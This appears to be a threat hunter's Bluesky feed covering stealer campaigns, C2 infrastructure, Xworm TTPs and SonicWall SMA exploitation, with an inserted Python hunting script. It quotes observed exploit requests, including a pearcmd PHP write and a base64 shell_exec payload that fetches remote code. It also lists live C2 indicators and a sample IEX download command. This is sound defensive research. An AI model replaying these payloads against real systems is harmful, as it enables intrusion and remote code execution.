Cyb3rhawk

@cyb3rhawk.bsky.social

Cyb3rhawk leads a threat hunting team. Interested in DE&TH, threat intel and DFIR. Always striving to make the daily grind of SOC analysts a breeze. Always eager to learn from others and look out for new ways to streamline what I learn.

139 Followers  |  1,211 Following  |  31 Posts  |  Joined: 12.11.2024  |  2.0304

Latest posts by cyb3rhawk.bsky.social on Bluesky

As recent SharePoint exploits settled a bit, I wanted to analyze payload variants to understand why attackers made specific choices. ASPX for quick access, DLLs for persistence, and IIS modules for blending in.

21.08.2025 02:19 — 👍 0  🔁 0  💬 0  📌 0

Soul instead of Shell — Payloads with Purpose: What SharePoint’s RCE May Teach Us About Payload Design and Detection/Hunt Strategy

The goal of the blog (Soul instead of Shell) is to understand constraints that force payload decisions and how they can help us detect/hunt.
Every payload has a soul - and understanding it makes us better hunters.

medium.com/@cyb3r-hawk/...

21.08.2025 02:18 — 👍 1  🔁 0  💬 1  📌 0

medium.com/me/stats/pos... medium.com/me/stats/pos...

29.04.2025 06:24 — 👍 0  🔁 0  💬 0  📌 0

(urlscan: page.url:http://bitbucket.org task.url:http://blogspot.com)
Hunt:
Who runs netsh, and in what context?
How often is Set-MpPreference used?
Who creates exclusions, and when?

28.04.2025 20:40 — 👍 0  🔁 0  💬 0  📌 0

Key TTPs:
AMSI bypass (reflection, AMSIReaper, NukeAMSI)
COM hijacking for persistence
Defender exclusions (paths/exts/procs)
UAC bypass (EnableLUA)
Firewall off (netsh)
Set-MpPreference abuse
C2: Blogspot → bitbucket redirects

28.04.2025 20:40 — 👍 0  🔁 0  💬 1  📌 0

Recent #Xworm infections (esp. during tax season) follow a pattern:
mshta.exe → Scheduled Tasks → IEX execution.

#ThreatHunting #DetectionEngineering #MalwareAnalysis #DefenseEvasion

28.04.2025 20:40 — 👍 0  🔁 0  💬 2  📌 0
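As an added example (not code from the original posts), the Hunt questions and Key TTPs in the thread above turned into a small Python triage over process-creation events: it flags Defender exclusions and tampering via Set-MpPreference, netsh firewall disabling, EnableLUA changes, and the mshta.exe → scheduled task → IEX chain, then counts who ran each and how often. The event field names and all sample events are constructed assumptions.

```python
"""Added hunt logic for the TTPs in the posts above; events are constructed samples."""
import re
from collections import Counter

# One regex per TTP from the Key TTPs post, applied to the process command line.
RULES = {
    "defender_exclusion": re.compile(r"Set-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I),
    "defender_tamper": re.compile(r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection)", re.I),
    "firewall_off": re.compile(r"netsh\b.*advfirewall\b.*\bstate\s+off", re.I),
    "uac_bypass": re.compile(r"reg(\.exe)?\s+add\b.*EnableLUA\b.*\b0\b", re.I),
}
# The Xworm chain from the post: mshta.exe -> scheduled task -> powershell IEX.
TASK_IEX = re.compile(r"schtasks\b.*/create\b.*(powershell|pwsh)\b.*\bIEX\b", re.I)


def hunt(events):
    """Return (hits, counts). hits: (rule, user, image, cmdline) tuples;
    counts: how often each (rule, user) pair fired, i.e. who runs it and how often."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((name, ev["user"], ev["image"], cmd))
        # Chain check needs parent context, not just the command line.
        if ev["parent"].lower().endswith("mshta.exe") and TASK_IEX.search(cmd):
            hits.append(("mshta_to_task", ev["user"], ev["image"], cmd))
    return hits, Counter((rule, user) for rule, user, _, _ in hits)


# Constructed sample events with assumed EDR/Sysmon-style fields; not real telemetry.
EVENTS = [
    {"user": "CORP\\helpdesk", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Set-MpPreference -ExclusionPath C:\\Users\\Public"'},
    {"user": "CORP\\jdoe", "parent": "mshta.exe", "image": "cmd.exe",
     "cmdline": 'cmd /c schtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden '
                'IEX (New-Object Net.WebClient).DownloadString(\'hxxp://example.invalid/x\')"'},
    {"user": "CORP\\jdoe", "parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"user": "CORP\\jdoe", "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
                "/v EnableLUA /t REG_DWORD /d 0 /f"},
    {"user": "CORP\\sccm_svc", "parent": "ccmexec.exe", "image": "powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"user": "CORP\\admin", "parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh interface show interface"},  # benign netsh: context decides
]

if __name__ == "__main__":
    for (rule, user), n in sorted(hunt(EVENTS)[1].items()):
        print(f"{rule:20} {user:15} x{n}")
```

The per-(rule, user) counts are what turn the post's questions into a baseline: a service account that sets exclusions every day looks different from a user who does it once, right after an mshta-spawned task.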

Credential sellers: DaisyCloud (also sells RedLine stealer logs), moderdolboeb, m3g4
Distribution Locations: https://t[.]me/+seHLUhOHbVhMDM0, breachforums, cracking[.]org, hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world, nulledbb[.]com.

25.04.2025 07:05 — 👍 0  🔁 0  💬 0  📌 0
"A.P.E.X: Threat Hunting Through Structured Hypothesis Generation Our latest report on Hunters International ransomware provides several hypotheses you can implement in your environment. We want to reiterate the importance of integrating environmental context with t...

We will end with the Hunting Hypothesis using A.P.E.X (lnkd.in/gJ9BmStA) and Adversary infrastructure queries to discover Lumma panels, C2s, etc.

Telegram distribution via t[.]me/hitbase, t[.]me/sharmamod disguised as IPTV or Netflix access.

25.04.2025 07:04 — 👍 0  🔁 0  💬 1  📌 0

Lumma Stealer — Threat Hunting and Infrastructure Analysis: We all heard of Lumma Stealer by now and how it has positioned itself as the top infostealer market share[1] after Mirai. Its initial…

Lumma Stealer is one of, if not the dominant, infostealer with a diverse distribution ecosystem from GitHub, Telegram, and multiple others. In this blog, we will look at distribution channels, credential sellers, and locations where logs are sold.

medium.com/@cyb3r-hawk/...

25.04.2025 07:04 — 👍 1  🔁 0  💬 1  📌 0

My next post is live. In this one, we will build upon our previous theoretical introduction of the LAYER approach and see its practical implementation using the BlackBasta chat leaks - specifically related to "bypassing EDR."
#cybersecurity #threathunting #thrunting #THORcollective

11.04.2025 00:27 — 👍 0  🔁 0  💬 0  📌 0

I had fun writing this. See how treating "bypass" as a single technique creates blind spots in our hunting. We will continue this with a practical example using the BlackBasta leaks.
#infosec #threathunting #thrunting #blueteam #threatdetection #THORcollective

03.04.2025 15:56 — 👍 4  🔁 1  💬 0  📌 0

A ransomware strain ("SuperBlack") by actor "Mora_001" is currently targeting two recent Fortinet zero-day vulnerabilities (CVE-2024-55591 and CVE-2025-24472). I investigated multiple intrusions between January and March, and most of them have a similar attack chain.
Read it at lnkd.in/g5fefgbq

13.03.2025 17:18 — 👍 0  🔁 0  💬 0  📌 0

Glad to have been featured in the Cyber Focus podcast and to have been allowed to comment on our 2024 Threat Roundup report. We discussed key findings, threats to critical infrastructure, OT security risks, and threat hunting frameworks and cyber resilience.
Check it out:
youtu.be/ndOpYFiabbc?...

19.02.2025 20:40 — 👍 0  🔁 0  💬 0  📌 0

45.89.196.11
37.27.63.3
45.89.196.115 (reported in the past)

Will blog on more details.

01.02.2025 03:07 — 👍 0  🔁 0  💬 0  📌 0

4) hxxp://45.89.196[.]115/core/sendPart - C2
Adversary Infra:

37.27.63.3:443 (kyfjlijv[.]ru) -
84.200.154.182 (not detected by VT yet)
smkuksool[.]com
2a01:4f9:3081:3098:0:0:0:2
services.ssh.server_host_key.fingerprint_sha256: 92709a98601c28a87fa307e63ae8bc60f870c6b9533a2d50bdb2c16fda205c37

01.02.2025 03:07 — 👍 0  🔁 0  💬 1  📌 0

IP:
1) 45.89.196[.]115 - C2 and stealer panel
2) 104.22.0[.]232 - cutt[.]ly (Cloudflare)
1) hxxps://cutt[.]ly/guessintegrates - (initial URL)
2) hxxps://kyfjlijv[.]ru/guessintegrates.bat (Initial stage BAT file generated with Kodiac and zip file)
3) hxxp://45.89.196[.]115/core/createSession - C2

01.02.2025 03:06 — 👍 0  🔁 0  💬 1  📌 0

01.02.2025 03:05 — 👍 0  🔁 0  💬 1  📌 0

Amatera Stealer:
Following the trend of infostealers, while a recent campaign of AMOS stealer targeted macOS users (lnkd.in/gD8Da4mv), a new Windows-focused stealer called Amatera was observed during my recent intrusion analysis.
#Amatera #infoStealer #windows #telegram #crypto #cyber #security

01.02.2025 03:04 — 👍 0  🔁 0  💬 1  📌 0
Fake Homebrew Clone Campaign: Mapping Atomic Stealer’s Infrastructure There’s a clone of brew (brewe[.]sh) targeted towards Mac users via the curl command. When the user executes the curl command, it downloads an update file from norikosumiya[.]com. The downloaded…

Wrote something on Atomic infostealer's latest attempt to infect Mac users through a cloned brew site and a malicious curl command. medium.com/@cyb3r-hawk/...

#macos #Atomic #infostealer #MachO #brew #SEO #google #ads #telegram #google #Chromium #crypto #wallet #cyber #security #site #impersonation

21.01.2025 05:29 — 👍 0  🔁 0  💬 0  📌 0

For some folks, Threat hunting research might lack a structured approach, leading to scattered and inefficient processes. This lack of structure hinders building upon previous hunts and scaling the threat hunting process effectively.
#ThreatHunting #Research #Cybersecurity
medium.com/p/90e020ffcf...

15.01.2025 20:20 — 👍 0  🔁 0  💬 0  📌 0

Had fun writing on Chaya_003, targeting engineering workstations. It evolved from a process-killing executable analysis to an interesting investigation. The blend of technical, geopolitical, and IT-OT aspects made it even more interesting.
lnkd.in/g55hiBcP

#ICS #engineering #workstations #Discord

20.12.2024 05:51 — 👍 0  🔁 0  💬 0  📌 0

Not every anomaly is malicious. In the post, I go over how to define success criteria and how you can embrace "false positives" when performing threat-hunting. I used user-agents analysis as an example to try and drive it home. open.substack.com/pub/cyb3rsec...

#threathunting

17.12.2024 20:26 — 👍 0  🔁 0  💬 0  📌 0

In my latest blog post, I showed how to use user-agent analysis in threat-hunting to spot suspicious patterns and unauthorized software using environmental knowledge and known-normal.
open.substack.com/pub/cyb3rsec...

#ThreatHunting #Detection #Engineering #User #agent #analysis

11.12.2024 20:57 — 👍 1  🔁 0  💬 0  📌 0

Required Actions:
- Update systems to version 10.2.1.14-75sv or higher
- Review and implement geographic access controls
- Enable multi-factor authentication for all users
- Scan appliance for unauthorized web shells
- Check for connections originating from the appliance

11.12.2024 06:18 — 👍 0  🔁 0  💬 0  📌 0

IP addresses from:
- United States
- The Netherlands
- Russia
ASN providers:
- 3xK Tech GmbH
- Namecheap, Inc.
- Comcast Cable Communications, LLC
- Additional regional ISPs

11.12.2024 06:18 — 👍 0  🔁 0  💬 1  📌 0

- Insert PHP code for execution
<host>:443/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php

11.12.2024 06:18 — 👍 1  🔁 0  💬 1  📌 0

- Execute system commands
<host>:443/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input rule-match="<?php shell_exec(base64_decode("wd0kkgn1cmwgahr0cdovlzk0lje1ni4xnzcumta5l3noihx8ihdnzxqgahr0cdovlzk0lje1ni4xnzcumta5l3noic1plsk"

11.12.2024 06:18 — 👍 0  🔁 0  💬 1  📌 0

The exploitation attempts include:

- Access system files remotely
A variant of the Mirai bot was observed attempting to access /etc/passwd through: <host>:443/cgi-bin/jarrewrite.sh
Sample hash: 464b397279bcf2d0e5ac86776166a7ca808d87570e87e37e5290b6b290ac1fc5

11.12.2024 06:18 — 👍 0  🔁 0  💬 1  📌 0

Current Activity:
We are observing multiple attack patterns against these devices. Password spraying attempts test admin/administrator credentials together with a small set of unknown user names.

11.12.2024 06:18 — 👍 0  🔁 0  💬 1  📌 0

SonicWall released an advisory on December 4th, SNWLID-2024-0018, that affects several SMA 100 Series devices. These devices include 500v, SMA 200, 210, 400, and 410 models running versions 10.2.1.13-72sv and earlier.

#CVE #SonicWall #SMA100 #ThreatIntel #SSL #VPN #vulnerabilities

11.12.2024 06:18 — 👍 0  🔁 0  💬 1  📌 0